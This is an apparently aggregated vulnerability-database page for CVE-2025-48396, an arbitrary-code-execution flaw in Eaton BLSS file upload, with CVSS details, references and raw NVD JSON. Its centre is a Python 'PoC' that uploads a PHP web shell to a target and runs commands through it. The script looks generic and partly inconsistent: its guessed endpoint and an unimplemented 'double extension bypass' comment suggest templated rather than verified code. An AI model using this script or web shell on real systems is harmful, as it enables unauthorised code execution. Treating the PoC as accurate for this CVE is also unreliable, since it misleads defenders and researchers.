CVE-2025-48396

Description

Arbitrary code execution is possible due to improper validation of the file upload functionality in Eaton BLSS. This security issue has been fixed in the latest script patch latest version of of Eaton BLSS (7.3.0.SCP004).

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Eaton BLSS < 7.3.0.SCP004

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-48396 PoC - Eaton BLSS Arbitrary File Upload
# Description: Improper validation in file upload allows arbitrary code execution

TARGET_URL = "http://target-website.com"
UPLOAD_ENDPOINT = f"{TARGET_URL}/api/upload"
SHELL_ENDPOINT = f"{TARGET_URL}/uploads/webshell.php"

def create_webshell():
    """Generate malicious PHP webshell"""
    php_code = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    return php_code

def exploit_file_upload():
    """Exploit the file upload vulnerability"""
    print("[*] Starting CVE-2025-48396 exploitation...")
    
    # Create malicious file with double extension bypass
    files = {
        'file': ('webshell.php', create_webshell(), 'application/x-php')
    }
    
    data = {
        'filename': 'webshell.php'
    }
    
    try:
        # Send malicious upload request
        response = requests.post(UPLOAD_ENDPOINT, files=files, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] File uploaded successfully!")
            print(f"[+] Shell location: {SHELL_ENDPOINT}")
            
            # Verify shell execution
            cmd_check = requests.get(f"{SHELL_ENDPOINT}?cmd=whoami", timeout=5)
            if cmd_check.status_code == 200:
                print("[+] Code execution confirmed!")
                print(f"[+] Output: {cmd_check.text}")
                return True
        else:
            print(f"[-] Upload failed with status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {str(e)}")
        return False

if __name__ == "__main__":
    exploit_file_upload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-48396
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-48396
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-48396/
[4] VulDB https://vuldb.com/cve/CVE-2025-48396
[5] https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1021.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-48396", "sourceIdentifier": "[email protected]", "published": "2025-11-03T08:15:34.077", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary code execution is possible due to improper validation of the file upload functionality in Eaton BLSS. This security issue has been fixed in the latest script patch latest version of of Eaton BLSS (7.3.0.SCP004)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1021.pdf", "source": "[email protected]"}]}}